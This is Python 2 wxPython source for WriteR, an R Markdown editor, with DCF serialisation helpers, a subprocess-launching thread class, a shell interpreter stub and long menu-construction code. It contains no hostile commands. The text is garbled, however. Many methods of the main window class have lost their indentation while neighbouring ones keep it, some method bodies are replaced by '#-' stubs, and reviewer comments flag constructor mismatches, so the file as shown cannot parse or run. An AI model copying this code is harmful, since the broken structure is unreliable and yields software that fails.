def dcf_dumps(data, sort_keys=True):
    """Serialize a dict to DCF (Debian-control-file) style text.

    Each entry becomes ``key: value``; embedded newlines in a value are
    continued on the next line with one leading space, and ``None`` values
    are written as the literal string ``None`` (the inverse of dcf_loads).

    Args:
        data: mapping of string keys to string (or None) values.
        sort_keys: when True (default), emit entries in sorted key order;
            when False, in the mapping's own iteration order.  (The original
            accepted this parameter but always sorted — fixed.)

    Returns:
        str: the serialized text, one (possibly continued) field per line.
    """
    items = data.items()
    if sort_keys:
        items = sorted(items)
    lines = []
    for key, value in items:
        if value is None:
            value = 'None'  # symmetric with dcf_loads, which maps 'None' back to None
        lines.append("{:}: {:}\n".format(key, value.replace('\n', '\n ')))
    return "".join(lines)
def dcf_loads(string):
    """Parse DCF-style text (as produced by dcf_dumps) back into a dict.

    A line beginning with a space continues the previous field with an
    embedded newline; a value of the literal string 'None' becomes None.
    """
    result = {}
    current_key = None
    for line in string.split('\n'):
        if not line:
            continue
        if line.startswith(' '):
            # Continuation line: glue onto the most recently seen field.
            result[current_key] += "\n{:}".format(line[1:])
        else:
            key, value = line.split(': ')
            result[key] = None if value == 'None' else value
            current_key = key
    return result
def printing(*args):
    # Debug helper: echoes its arguments (as a tuple, via the Python 2 print
    # statement) only when the module-level print_option flag is True.
    if print_option: print args
class BashProcessThread(Thread):
    """Daemon thread wrapper that launches an external command.

    NOTE(review): the run() override was removed (see the `#-` marker below),
    so start() currently executes Thread's default no-op run(); the only real
    work happens in this constructor, which spawns the subprocess eagerly.
    The output-forwarding loop presumably lived in run() — confirm before use.
    """

    def __init__(self, flag, input_list, writelineFunc):
        # flag: threading.Event used by the owner to request shutdown
        #       (stored but not consulted in the code visible here).
        # input_list: argv list handed straight to Popen (no shell).
        # writelineFunc: callable that receives output lines (unused here).
        Thread.__init__(self)
        self.flag = flag
        self.writelineFunc = writelineFunc
        self.setDaemon(True)
        self.input_list = input_list
        printing(input_list)
        # stderr is merged into stdout so a single pipe carries everything.
        self.comp_thread = Popen(input_list, stdout=PIPE, stderr=STDOUT)

    #- def run(self):
class MyInterpretor(object):
    """Minimal InterpClass for wx.py.shell.Shell backed by a subprocess.

    NOTE(review): BashProcessThread is constructed below with a single
    argument, but its __init__ takes (flag, input_list, writelineFunc) —
    instantiating this class would raise TypeError as written.  The class is
    only reachable via the (unused) CreateShellCtrl; confirm before enabling.
    """

    def __init__(self, locals, rawin, stdin, stdout, stderr):
        # Attributes expected by wx.py.shell.Shell from its interpreter object.
        self.introText = "Welcome to stackoverflow bash shell"
        self.locals = locals
        self.revision = 1.0
        self.rawin = rawin
        self.stdin = stdin
        self.stdout = stdout
        self.stderr = stderr
        self.more = False

        # bash process: unbuffered child whose stderr is folded into stdout
        self.bp = Popen(['python', '-u', 'test_out.py'], shell=False, stdout=PIPE, stdin=PIPE, stderr=STDOUT)

        # start output grab thread
        self.outputThread = BashProcessThread(self.bp.stdout.readline)
        self.outputThread.start()

        # start err grab thread
        # self.errorThread = BashProcessThread(self.bp.stderr.readline)
        # self.errorThread.start()

    #- def getAutoCompleteKeys(self):
    #- def getAutoCompleteList(self, *args, **kwargs):
    #- def getCallTip(self, command):
    #- def push(self, command):
# IDs used by the settings dialog / configuration handlers.
ID_DIRECTORY_CHANGE = wx.NewId()
ID_CRAN = wx.NewId()
ID_R_PATH = wx.NewId()
ID_BUILD_COMMAND = wx.NewId()
ID_KNIT2HTML_COMMAND = wx.NewId()
ID_KNIT2PDF_COMMAND = wx.NewId()
ID_NEWTEXT = wx.NewId()

# get on with the program
class MainWindow(wx.Frame):
    def __init__(self, parent=None, id=-1, title="", pos=wx.DefaultPosition,
                 size=(1200,700), style=wx.DEFAULT_FRAME_STYLE |
                                        wx.SUNKEN_BORDER |
                                        wx.CLIP_CHILDREN, filename="untitled.Rmd"):
        """Build the main frame: load persisted settings, decide which file to
        open (command-line arg > last-session file > Open dialog), create the
        UI, and wire up the find/replace events.

        NOTE(review): OnClose, OnFind, OnFindClose, getSettings and
        GetRDirectory are defined elsewhere in this class (outside this
        excerpt) — confirmed used, not defined here.
        """
        super(MainWindow, self).__init__(parent, id, title, pos, size, style)
        self.Bind(wx.EVT_CLOSE, self.OnClose)
        self._mgr = AuiManager()
        self._mgr.SetManagedWindow(self)
        self.ChosenFontSize = 14
        self.font = wx.Font(self.ChosenFontSize, wx.MODERN, wx.NORMAL, wx.NORMAL, False, u'Consolas')
        self.settingsFile = "WriteROptions"
        # Defaults, overridden by whatever getSettings reads from disk.
        self.settings = {#'dirname': 'none',
                         # 'templates': 'none',
                         'lastdir': '.',
                         'filename': 'none',
                         'newText': "Use WriteR to edit your R markdown files, perhaps by starting from a template file",
                         'RDirectory': self.GetRDirectory()}
        self.settings = self.getSettings(self.settingsFile, self.settings)
        if len(sys.argv) > 1:
            # A file was passed on the command line: open it (last arg wins).
            self.settings['lastdir'], self.settings['filename'] = split(realpath(sys.argv[-1]))
            self.filename = self.settings['filename']
            self.dirname = self.settings['lastdir']
            self.CreateExteriorWindowComponents()
            self.CreateInteriorWindowComponents()
            self.fileOpen(self.dirname, self.filename)
        elif self.settings['filename'] == 'none':
            # No remembered file: prompt the user with the Open dialog.
            self.filename = filename
            self.dirname = self.settings['lastdir']
            self.CreateExteriorWindowComponents()
            self.CreateInteriorWindowComponents()
            self.OnOpen(self)
            # set the save flag to true if OnOpen is cancelled
        else:
            # Reopen the file from the previous session.
            self.filename = self.settings['filename']
            self.dirname = self.settings['lastdir']
            self.CreateExteriorWindowComponents()
            self.CreateInteriorWindowComponents()
            self.fileOpen(self.dirname, self.filename)
        printing(self.settings['RDirectory'])
        self.x = 0
        # create a flag for exiting subthreads
        self.sub_flag = Event()
        self.comp_thread = None
        # for find and find/replace dialogues we need...
        self.Bind(wx.EVT_FIND, self.OnFind)
        self.Bind(wx.EVT_FIND_NEXT, self.OnFind)
        self.Bind(wx.EVT_FIND_REPLACE, self.OnFind)
        self.Bind(wx.EVT_FIND_REPLACE_ALL, self.OnFind)
        self.Bind(wx.EVT_FIND_CLOSE, self.OnFindClose)
    def CreateInteriorWindowComponents(self):
        """Create the editor (center pane) and the read-only console (bottom
        pane, hidden until a build writes to it), managed by AUI."""
        self.editor = self.CreateTextCtrl(self.settings['newText'])
        self.console = self.CreateTextCtrl("")
        self.console.SetEditable(False)
        self._mgr.AddPane(self.console, AuiPaneInfo().Name("console")
                          .Caption("Console").Bottom().Layer(1).Position(1).CloseButton(True)
                          .MinimizeButton(True).Hide())
        self._mgr.AddPane(self.editor, AuiPaneInfo().Name('editor').
                          CenterPane().Hide())
        self._mgr.GetPane("console").Hide().Bottom().Layer(0).Row(0).Position(0)
        self._mgr.GetPane("editor").Show()
        self.editor.SetFocus()
        self.editor.SelectAll()
        self._mgr.Update()
        # self.control = wx.TextCtrl(self, style=wx.TE_MULTILINE)
    def CreateExteriorWindowComponents(self):
        """Create the frame chrome: menu bar, status bar, and window title."""
        self.CreateMenu()
        self.StatusBar()
        self.SetTitle()
def CreateMenu(self):
fileMenu = wx.Menu()
for id, label, helpText, handler in \
[(wx.ID_NEW, "New file\tCtrl+N", "Start a new file", self.OnNewFile),
(wx.ID_OPEN, "&Open\tCtrl+O", "Open an existing file", self.OnOpen),
(wx.ID_SAVE, "&Save\tCtrl+S", "Save the current file", self.OnSave),
(wx.ID_SAVEAS, "Save &As\tCtrl+Shift+S", "Save the file under a different name", self.OnSaveAs),
(None,) * 4,
(wx.ID_EXIT, "Quit && save\tCtrl+Q", "Saves the current file and closes the program", self.OnSafeExit)]:
if id == None:
fileMenu.AppendSeparator()
else:
item = fileMenu.Append(id, label, helpText)
self.Bind(wx.EVT_MENU, handler, item)
menuBar = wx.MenuBar() # create the menu bar object
menuBar.Append(fileMenu, "&File") # Add the fileMenu to the MenuBar
editMenu = wx.Menu()
for id, label, helpText, handler in \
[(wx.ID_CUT, "Cu&t\tCtrl+X", "Cut highlighted text to clipboard", self.OnCut),
(wx.ID_COPY, "&Copy\tCtrl+C", "Copy highlighted text to clipboard", self.OnCopy),
(wx.ID_PASTE, "&Paste\tCtrl+V", "Paste text from clipboard", self.OnPaste),
(wx.ID_SELECTALL, "Select all\tCtrl+A", "Highlight entire text", self.OnSelectAll),
(wx.ID_DELETE, "&Delete", "Delete highlighted text", self.OnDelete),
(ID_WORDCOUNT, "Word count (broken)\tCtrl+w", "get a word count of the entire text", self.OnWordCount),
(None,) * 4,
(ID_FINDONLY, "Find\tCtrl+F", "Open a standard find dialog box", self.OnShowFindToFix),
(ID_GOTO, "Go to line (broken)\tCtrl+g", "Open a dialog box to choose a line number", self.OnGoToLine),
(ID_FINDREPLACE, "Find/replace\tCtrl+H", "Open a find/replace dialog box", self.OnShowFindReplaceToFix),
(None,) * 4,
(ID_SETTINGS, 'Settings', "Setup the editor to your liking", self.OnSettings)]:
if id == None:
editMenu.AppendSeparator()
else:
item = editMenu.Append(id, label, helpText)
self.Bind(wx.EVT_MENU, handler, item)
menuBar.Append(editMenu, "&Edit") # Add the editMenu to the MenuBar
viewMenu = wx.Menu()
self.ShowStatusBar = viewMenu.Append(wx.ID_ANY, "Show status bar",
"Show Status bar", kind=wx.ITEM_CHECK)
viewMenu.Check(self.ShowStatusBar.GetId(), True)
self.Bind(wx.EVT_MENU, self.ToggleStatusBar, self.ShowStatusBar)
self.IncreaseFont = viewMenu.Append(wx.ID_ANY, "Increase the font size\tCtrl+=", "Increase the font size")
self.Bind(wx.EVT_MENU, self.OnIncreaseFontSize, self.IncreaseFont)
self.DecreaseFont = viewMenu.Append(wx.ID_ANY, "Decrease the font size\tCtrl+-", "Decrease the font size")
self.Bind(wx.EVT_MENU, self.OnDecreaseFontSize, self.DecreaseFont)
self.ChooseFont = viewMenu.Append(wx.ID_ANY, "Choose font\tCtrl+D", "Choose the font size and other details")
self.Bind(wx.EVT_MENU, self.OnSelectFont, self.ChooseFont )
menuBar.Append(viewMenu, "View") # Add the view Menu to the MenuBar
buildMenu = wx.Menu()
self.Render = buildMenu.Append(wx.ID_ANY, "Render the document\tF5", "Use the rmarkdown package to render the document into the chosen format")
self.Bind(wx.EVT_MENU, self.OnRenderNull, self.Render)
# Create render menu
renderMenu = wx.Menu()
self.ChooseRenderNull = renderMenu.Append(wx.ID_ANY, "Render using defaults", "Use the rmarkdown package and render function to create HTML or only the first of multiple formats specified in YAML header", wx.ITEM_RADIO)
self.Bind(wx.EVT_MENU, self.OnSelectRenderNull, self.ChooseRenderNull)
self.ChooseRenderHtml = renderMenu.Append(wx.ID_ANY, "Render into HTML only", "Use the rmarkdown package and render function to create HTML", wx.ITEM_RADIO)
self.Bind(wx.EVT_MENU, self.OnSelectRenderHtml, self.ChooseRenderHtml)
self.ChooseRenderWord = renderMenu.Append(wx.ID_ANY, "Render into Microsoft Word only", "Use the rmarkdown package and render function to create Microsoft Word", wx.ITEM_RADIO)
self.Bind(wx.EVT_MENU, self.OnSelectRenderWord, self.ChooseRenderWord)
self.ChooseRenderSlidy = renderMenu.Append(wx.ID_ANY, "Render into slidy only", "Use the rmarkdown package and render function to create a slidy presentation", wx.ITEM_RADIO)
self.Bind(wx.EVT_MENU, self.OnSelectRenderSlidy, self.ChooseRenderSlidy)
self.ChooseRenderPdf = renderMenu.Append(wx.ID_ANY, "Render into pdf only", "Use the rmarkdown package and render function to create pdf", wx.ITEM_RADIO)
self.Bind(wx.EVT_MENU, self.OnSelectRenderPdf, self.ChooseRenderPdf)
self.ChooseRenderAll = renderMenu.Append(wx.ID_ANY, "Render into all specified formats", "Use the rmarkdown package and render function to create multiple output documents", wx.ITEM_RADIO)
self.Bind(wx.EVT_MENU, self.OnSelectRenderAll, self.ChooseRenderAll)
buildMenu.AppendMenu(-1, "Set render process to...", renderMenu) # Add the render Menu as a submenu to the build menu
for id, label, helpText, handler in \
[
(ID_KNIT2HTML, "Knit to html\tF6", "Knit the script to HTML", self.OnKnit2html),
(ID_KNIT2PDF, "Knit to pdf\tShift+F6", "Knit the script to a pdf file using LaTeX", self.OnKnit2pdf)]:
if id == None:
buildMenu.AppendSeparator()
else:
item = buildMenu.Append(id, label, helpText)
self.Bind(wx.EVT_MENU, handler, item)
menuBar.Append(buildMenu, "Build") # Add the Build Menu to the MenuBar
insertMenu = wx.Menu()
AddHeadBlock = insertMenu.Append(-1, "header/preamble\tCtrl+Shift+H")
self.Bind(wx.EVT_MENU, self.OnAddHeadBlock, AddHeadBlock)
AddURL = insertMenu.Append(-1, "URL\tCtrl+Shift+U")
self.Bind(wx.EVT_MENU, self.OnAddURL, AddURL)
AddEMail = insertMenu.Append(-1, "e-mail\tCtrl+Shift+E")
self.Bind(wx.EVT_MENU, self.OnAddEMail, AddEMail)
AddFigure = insertMenu.Append(-1, "Figure\tCtrl+Shift+F")
self.Bind(wx.EVT_MENU, self.OnAddFigure, AddFigure)
AddReference = insertMenu.Append(-1, "Reference\tCtrl+Shift+R")
self.Bind(wx.EVT_MENU, self.OnAddReference, AddReference)
headingsMenu = wx.Menu()
for id, label, helpText, handler in \
[
(ID_H1, "level &1\tAlt+1", "insert heading level 1", self.OnHeading1),
(ID_H2, "level &2\tAlt+2", "insert heading level 2", self.OnHeading2),
(ID_H3, "level &3\tAlt+3", "insert heading level 3", self.OnHeading3),
(ID_H4, "level &4\tAlt+4", "insert heading level 4", self.OnHeading4),
(ID_H5, "level &5\tAlt+5", "insert heading level 5", self.OnHeading5),
(ID_H6, "level &6\tAlt+6", "insert heading level 6", self.OnHeading6)]:
if id == None:
headingsMenu.AppendSeparator()
else:
item = headingsMenu.Append(id, label, helpText)
self.Bind(wx.EVT_MENU, handler, item)
insertMenu.AppendMenu(-1, "Heading", headingsMenu)
menuBar.Append(insertMenu, "Insert") # Add the Insert Menu to the MenuBar
formatMenu = wx.Menu()
for id, label, helpText, handler in \
[
(ID_BOLD, "Bold\tCtrl+B", "move to bold face font", self.OnBold),
(ID_ITALIC, "Italic\tCtrl+I", "move to italic face font", self.OnItalic),
(ID_CODE, "Code\tCtrl+`", "present using a typewriter font commonly seen when showing code", self.OnCode),
(ID_MATH, "Maths mode\tCtrl+4", "move text to maths mode", self.OnMath),
(ID_RNDBRK, "Round brackets\tAlt+Shift+(", "Wrap text in round () brackets", self.OnRoundBrack),
(ID_SQBRK, "Square brackets\tAlt+[", "Wrap text in square brackets", self.OnSquareBrack),
(ID_CRLBRK, "Curly brackets\tAlt+Shift+{", "Wrap text in curly brackets", self.OnCurlyBrack),
(ID_BRNDBRK, "Round brackets (math)\tAlt+Shift+)", "Wrap math in round () brackets", self.OnMathRoundBrack),
(ID_BSQBRK, "Square brackets (math)\tAlt+]", "Wrap math in square brackets", self.OnMathSquareBrack),
(ID_BCRLBRK, "Curly brackets (math)\tAlt+Shift+}", "Wrap math in curly brackets", self.OnMathCurlyBrack)]:
if id == None:
formatMenu.AppendSeparator()
else:
item = formatMenu.Append(id, label, helpText)
self.Bind(wx.EVT_MENU, handler, item)
menuBar.Append(formatMenu, "F&ormat") # Add the format Menu to the MenuBar
mathsMenu = wx.Menu()
symbolsMenu = wx.Menu()
for id, label, helpText, handler in \
[
(ID_SYMBOL_INFINITY, "infinity\tCtrl+Shift+I", "insert infinity", self.OnSymbol_infinity),
(ID_SYMBOL_TIMES, "times\tCtrl+Shift+*", "insert times", self.OnSymbol_times),
(ID_SYMBOL_PARTIAL, "partial derivative\tCtrl+Shift+D", "insert partial", self.OnSymbol_partial),
(ID_SYMBOL_PLUSMINUS, "plus or minus\tCtrl+Shift+=", "insert plus or minus sign", self.OnSymbol_plusminus),
(ID_SYMBOL_MINUSPLUS, "minus or plus\tCtrl+Shift+-", "insert minus or plus sign", self.OnSymbol_minusplus),
(ID_SYMBOL_LESSEQL, "less than or equal\tCtrl+Shift+<", "insert less than or equal sign", self.OnSymbol_leq),
(ID_SYMBOL_GRTREQL, "greater than or equal \tCtrl+Shift+>", "insert greater than or equal sign", self.OnSymbol_geq),
(ID_SYMBOL_NOTEQL, "not equal\tCtrl+Shift+!", "insert not equal sign", self.OnSymbol_neq),
(ID_SYMBOL_LEFTPAREN, "Left Parenthesis\tCtrl+9", "insert variable size left parenthesis", self.OnSymbol_LeftParen),
(ID_SYMBOL_RIGHTPAREN, "Right Parenthesis\tCtrl+0", "insert variable size right parenthesis", self.OnSymbol_RightParen),
(ID_SYMBOL_LEFTSQUARE, "Left Square bracket\tCtrl+[", "insert variable size left square bracket", self.OnSymbol_LeftSquare),
(ID_SYMBOL_RIGHTSQUARE, "Right Square bracket\tCtrl+]", "insert variable size right square bracket", self.OnSymbol_RightSquare),
(ID_SYMBOL_LEFTCURLY, "Left Curly bracket\tCtrl+Shift+{", "insert variable size left curly bracket", self.OnSymbol_LeftCurly),
(ID_SYMBOL_RIGHTCURLY, "Right Curly bracket\tCtrl+Shift+}", "insert variable size right curly bracket", self.OnSymbol_RightCurly)]:
if id == None:
symbolsMenu.AppendSeparator()
else:
item = symbolsMenu.Append(id, label, helpText)
self.Bind(wx.EVT_MENU, handler, item)
mathsMenu.AppendMenu(-1, "Symbols", symbolsMenu)
structuresMenu = wx.Menu()
for id, label, helpText, handler in \
[
(ID_SQUAREROOT, "Square root\tAlt+Ctrl+Shift+R", "insert a square root", self.OnSquareRoot),
(ID_MATHBAR, "bar \tCtrl+Shift+B", "insert a bar operator", self.OnMathBar),
(ID_ABSVAL, "Absolute values\tCtrl+Shift+A", "insert left and right absolute value delimiters", self.OnAbsVal),
(ID_FRACTION, "Fraction\tCtrl+Shift+/", "insert a fraction", self.OnFraction),
(ID_SUMMATION, "Summation\tAlt+Ctrl+Shift+S", "insert a summation", self.OnSummation),
(ID_INTEGRAL, "Integral\tAlt+Ctrl+Shift+I", "insert an integral", self.Onintegral),
(ID_PRODUCT, "Product\tAlt+Ctrl+Shift+P", "insert a product", self.OnProduct),
(ID_LIMIT, "Limit\tAlt+Ctrl+Shift+L", "insert a limit", self.OnLimit),
(ID_DOUBLESUMMATION, "Double summation\tAlt+Ctrl+Shift+D", "insert a double summation", self.OnDoubleSummation),
(ID_DOUBLEINTEGRAL, "Double integral", "insert a double integral", self.OnDoubleIntegral)]:
if id == None:
structuresMenu.AppendSeparator()
else:
item = structuresMenu.Append(id, label, helpText)
self.Bind(wx.EVT_MENU, handler, item)
mathsMenu.AppendMenu(-1, "Structures", structuresMenu)# Add the structures Menu as a submenu to the main menu
GreekMenu = wx.Menu()
for id, label, helpText, handler in \
[
(ID_GREEK_ALPHA, "alpha\tAlt+Shift+A", "insert greek letter alpha", self.OnGreek_alpha),
(ID_GREEK_BETA, "beta\tAlt+Shift+B", "insert greek letter beta", self.OnGreek_beta),
(ID_GREEK_GAMMA, "gamma\tAlt+Shift+G", "insert greek letter gamma", self.OnGreek_gamma),
(ID_GREEK_DELTA, "delta\tAlt+Shift+D", "insert greek letter delta", self.OnGreek_delta),
(ID_GREEK_EPSILON, "epsilon\tAlt+Shift+E", "insert greek letter epsilon", self.OnGreek_epsilon),
(ID_GREEK_VAREPSILON, "epsilon (variant)\tAlt+Shift+V", "insert variant of greek letter epsilon", self.OnGreek_varepsilon),
(ID_GREEK_ZETA, "zeta\tAlt+Shift+Z", "insert greek letter zeta", self.OnGreek_zeta),
(ID_GREEK_ETA, "eta\tAlt+Shift+W", "insert greek letter eta", self.OnGreek_eta),
(ID_GREEK_THETA, "theta\tAlt+Shift+H", "insert greek letter theta", self.OnGreek_theta),
(ID_GREEK_VARTHETA, "theta (variant)\tAlt+Shift+/", "insert variant of greek letter theta", self.OnGreek_vartheta),
(ID_GREEK_IOTA, "iota\tAlt+Shift+I", "insert greek letter iota", self.OnGreek_iota),
(ID_GREEK_KAPPA, "kappa\tAlt+Shift+K", "insert greek letter kappa", self.OnGreek_kappa),
(ID_GREEK_LAMBDA, "lambda\tAlt+Shift+L", "insert greek letter lambda", self.OnGreek_lambda),
(ID_GREEK_MU, "mu\tAlt+Shift+M", "insert greek letter mu", self.OnGreek_mu),
(ID_GREEK_NU, "nu\tAlt+Shift+N", "insert greek letter nu", self.OnGreek_nu),
(ID_GREEK_XI, "xi\tAlt+Shift+X", "insert greek letter xi", self.OnGreek_xi),
(ID_GREEK_OMICRON, "omicron\tAlt+Shift+O", "insert greek letter omicron", self.OnGreek_omicron),
(ID_GREEK_PI, "pi\tAlt+Shift+P", "insert greek letter pi", self.OnGreek_pi),
(ID_GREEK_RHO, "rho\tAlt+Shift+R", "insert greek letter rho", self.OnGreek_rho),
(ID_GREEK_SIGMA, "sigma\tAlt+Shift+S", "insert greek letter sigma", self.OnGreek_sigma),
(ID_GREEK_TAU, "tau\tAlt+Shift+T", "insert greek letter tau", self.OnGreek_tau),
(ID_GREEK_UPSILON, "upsilon\tAlt+Shift+U", "insert greek letter upsilon", self.OnGreek_upsilon),
(ID_GREEK_PHI, "phi\tAlt+Shift+F", "insert greek letter phi", self.OnGreek_phi),
(ID_GREEK_CHI, "chi\tAlt+Shift+C", "insert greek letter chi", self.OnGreek_chi),
(ID_GREEK_PSI, "psi\tAlt+Shift+Y", "insert greek letter psi", self.OnGreek_psi),
(ID_GREEK_OMEGA, "omega\tAlt+Shift+.", "insert greek letter omega", self.OnGreek_omega)]:
if id == None:
GreekMenu.AppendSeparator()
else:
item = GreekMenu.Append(id, label, helpText)
self.Bind(wx.EVT_MENU, handler, item)
mathsMenu.AppendMenu(-1, "Greek letters", GreekMenu)
menuBar.Append(mathsMenu, "Maths") # Add the maths Menu to the MenuBar
statsMenu = wx.Menu()
for id, label, helpText, handler in \
[
(ID_RCOMMAND, "Insert inline R command", "insert an in-line R command", self.OnRCommand),
(ID_RCHUNK, "Insert R code chunk\tAlt+R", "insert standard R code chunk", self.OnRChunk),
(ID_RGRAPH, "Insert R code chunk for a graph\tAlt+G", "insert R code chunk for a graph", self.OnRGraph),
(ID_RLASSIGN, "Insert a left assignment\tCtrl+<", "insert R code for the left assignment <-", self.OnRLAssign),
(ID_RRASSIGN, "Insert a right assignment\tCtrl+>", "insert R code for the right assignment ->", self.OnRRAssign),
(ID_RPIPE, "Insert a pipe operator\tCtrl+Shift+P", "insert R code for the pipe operator %>%", self.OnRPipe)]:
if id == None:
statsMenu.AppendSeparator()
else:
item = statsMenu.Append(id, label, helpText)
self.Bind(wx.EVT_MENU, handler, item)
menuBar.Append(statsMenu, "Stats") # Add the stats Menu to the MenuBar
helpMenu = wx.Menu()
for id, label, helpText, handler in \
[(wx.ID_ABOUT, "About", "Information about this program", self.OnAbout)]:
if id == None:
fileMenu.AppendSeparator()
else:
item = helpMenu.Append(id, label, helpText)
self.Bind(wx.EVT_MENU, handler, item)
menuBar.Append(helpMenu, "&Help") # Add the helpMenu to the MenuBar
self.SetMenuBar(menuBar) # Add the menuBar to the Frame
    def CreateShellCtrl(self):
        """Create a wx.py Shell pane backed by MyInterpretor.

        NOTE(review): appears unused in the visible code, and MyInterpretor's
        constructor has a known arity bug — confirm before wiring this in.
        """
        shell = Shell(self, -1, wx.Point(0, 0), wx.Size(150, 90),
                      wx.NO_BORDER | wx.TE_MULTILINE, InterpClass=MyInterpretor)
        shell.SetFont(self.font)
        return shell
def CreateTextCtrl(self, text):
text = wx.TextCtrl(self, -1, text, wx.Point(0, 0), wx.Size(150, 90),
wx.NO_BORDER | wx.TE_MULTILINE)
text.SetFont(self.font)
return text
    def SetTitle(self, *args, **kwargs):
        """Set the frame title to 'WriteR - <filename>' (any args are ignored)."""
        # MainWindow.SetTitle overrides wx.Frame.SetTitle, so we have to
        # call it using super:
        super(MainWindow, self).SetTitle("WriteR - %s" % self.filename)
# Helper methods:
def defaultFileDialogOptions(self):
return dict(message="Choose a file", defaultDir=self.dirname, wildcard="*.*")
    def askUserForFilename(self, **dialogOptions):
        """Show a file dialog; on OK, record the chosen file/dir and retitle.

        Returns True if the user picked a file, False if they cancelled.
        Side effects on OK: updates self.filename, self.dirname, window title.
        """
        dialog = wx.FileDialog(self, **dialogOptions)
        if dialog.ShowModal() == wx.ID_OK:
            userProvidedFilename = True
            self.filename = dialog.GetFilename()
            self.dirname = dialog.GetDirectory()
            self.SetTitle() # Update the window title with the new filename
        else:
            userProvidedFilename = False
        dialog.Destroy()
        return userProvidedFilename
# Event handlers:
# file menu events
    def OnOpen(self, event):
        """File > Open: ask for a file and load it into the editor (no-op on cancel)."""
        if self.askUserForFilename(style=wx.OPEN, **self.defaultFileDialogOptions()):
            self.fileOpen(self.dirname, self.filename)
def fileOpen(self, dirname, filename):
textfile = open(join(dirname, filename), "r")
self.editor.SetValue(textfile.read())
textfile.close()
    def OnNewFile(self, event):
        """File > New: open a file from the templates folder, then, for the
        blank template, stamp a creation-date line and prompt for Save As.

        NOTE(review): ".\\templates" is a Windows-style relative path —
        presumably the app always runs from its install dir; confirm on
        other platforms.
        """
        self.olddirname = self.dirname
        self.dirname = ".\\templates"
        self.OnOpen(event)
        self.dirname = self.olddirname
        if self.filename == "Blank.Rmd":
            self.editor.WriteText("% file created on " + asctime() + "\n\n")
            self.OnSaveAs(event)
    def OnSaveAs(self, event):
        """File > Save As: ask for a new name/location, then save (no-op on cancel)."""
        if self.askUserForFilename(defaultFile=self.filename, style=wx.SAVE, **self.defaultFileDialogOptions()):
            self.OnSave(event)
def OnSave(self, event):
textfile = open(join(self.dirname, self.filename), "w")
textfile.write(self.editor.GetValue())
textfile.close()
    def OnExit(self, event):
        """Close the main window (the EVT_CLOSE handler takes it from there)."""
        self.Close()  # Close the main window.
    def OnSafeExit(self, event):
        """File > Quit && save: save the current file first, then close."""
        self.OnSave(event)
        self.OnExit(event)
# help menu events
OnAbout = HelpMenuEvents.OnAbout
# edit menu events
OnSelectAll = EditMenuEvents.OnSelectAll
OnDelete = EditMenuEvents.OnDelete
OnPaste = EditMenuEvents.OnPaste
OnCopy = EditMenuEvents.OnCopy
OnCut = EditMenuEvents.OnCut
OnGoToLine = EditMenuEvents.OnGoToLine
OnWordCount = EditMenuEvents.OnWordCount
# view menu events
    def StatusBar(self):
        """Create a three-field status bar (widths 5:2:1) with the app blurb."""
        self.statusbar = self.CreateStatusBar()
        self.statusbar.SetFieldsCount(3)
        self.statusbar.SetStatusWidths([-5, -2, -1])
        self.SetStatusText(SBText)
def OnIncreaseFontSize(self, event):
self.font.SetPointSize(self.font.GetPointSize()+1)
self.UpdateUI()
def OnDecreaseFontSize(self, event):
self.font.SetPointSize(self.font.GetPointSize()-1)
self.UpdateUI()
    def UpdateUI(self):
        """Re-apply the current font to the editor and re-lay-out the frame.

        The commented lines are leftovers from a fuller font-info display;
        kept as-is for reference.
        """
        self.editor.SetFont(self.font)
        #self.editor.SetForegroundColour(self.curClr)
        #self.ps.SetLabel(str(self.font.GetPointSize()))
        #self.family.SetLabel(self.font.GetFamilyString())
        #self.style.SetLabel(self.font.GetStyleString())
        #self.weight.SetLabel(self.font.GetWeightString())
        #self.face.SetLabel(self.font.GetFaceName())
        #self.nfi.SetLabel(self.font.GetNativeFontInfo().ToString())
        self.Layout()
    def OnSelectFont(self, evt):
        """View > Choose font: show the wx font picker and apply the choice."""
        data = wx.FontData()
        data.EnableEffects(False)
        #data.SetColour(self.curClr)  # set colour
        data.SetInitialFont(self.font)

        dlg = wx.FontDialog(self, data)
        if dlg.ShowModal() == wx.ID_OK:
            data = dlg.GetFontData()
            font = data.GetChosenFont()
            #colour = data.GetColour()
            self.font = font
            #self.curClr = colour
            self.UpdateUI()

        # Don't destroy the dialog until you get everything you need from the
        # dialog!
        dlg.Destroy()
# general events
def StartThread(self, input_object):
if self.sub_flag.isSet(): return
if self.comp_thread is not None:
self.sub_flag.set()
while self.comp_thread.isAlive():
sleep(1)
self.sub_flag.clear()
self.console.SetValue('')
self.comp_thread = BashProcessThread(self.sub_flag, input_object, self.console.WriteText)
self.comp_thread.start()
# Build Menu events
OnRenderNull = RMarkdownEvents.OnRenderNull
OnBuild = OnRenderNull # sets default build
OnRenderHtml = RMarkdownEvents.OnRenderHtml
OnRenderSlidy = RMarkdownEvents.OnRenderSlidy
OnRenderAll = RMarkdownEvents.OnRenderAll
OnRenderWord = RMarkdownEvents.OnRenderWord
OnRenderPdf = RMarkdownEvents.OnRenderPdf
OnSelectRenderNull = RMarkdownEvents.OnSelectRenderNull
OnSelectRenderHtml = RMarkdownEvents.OnSelectRenderHtml
OnSelectRenderSlidy = RMarkdownEvents.OnSelectRenderSlidy
OnSelectRenderAll = RMarkdownEvents.OnSelectRenderAll
OnSelectRenderWord = RMarkdownEvents.OnSelectRenderWord
OnSelectRenderPdf = RMarkdownEvents.OnSelectRenderPdf
OnKnit2html = RMarkdownEvents.OnKnit2html
OnKnit2pdf = RMarkdownEvents.OnKnit2pdf
# R and RMarkdown events
OnRCommand = RMarkdownEvents.OnRCommand
OnRChunk = RMarkdownEvents.OnRChunk
OnRGraph = RMarkdownEvents.OnRGraph
OnRPipe = RMarkdownEvents.OnRPipe
OnRLAssign = RMarkdownEvents.OnRLAssign
OnRRAssign = RMarkdownEvents.OnRRAssign
# MathInserts are all LaTeX input for math mode
OnSymbol_infinity = MathInserts.OnSymbol_infinity
OnSymbol_plusminus = MathInserts.OnSymbol_plusminus
OnSymbol_minusplus = MathInserts.OnSymbol_minusplus
OnSymbol_geq = MathInserts.OnSymbol_geq
OnSymbol_leq = MathInserts.OnSymbol_leq
OnSymbol_neq = MathInserts.OnSymbol_neq
OnSymbol_times = MathInserts.OnSymbol_times
OnSymbol_partial = MathInserts.OnSymbol_partial
OnSymbol_LeftParen = MathInserts.OnSymbol_LeftParen
OnSymbol_RightParen = MathInserts.OnSymbol_RightParen
OnSymbol_LeftSquare = MathInserts.OnSymbol_LeftSquare
OnSymbol_RightSquare = MathInserts.OnSymbol_RightSquare
OnSymbol_LeftCurly = MathInserts.OnSymbol_LeftCurly
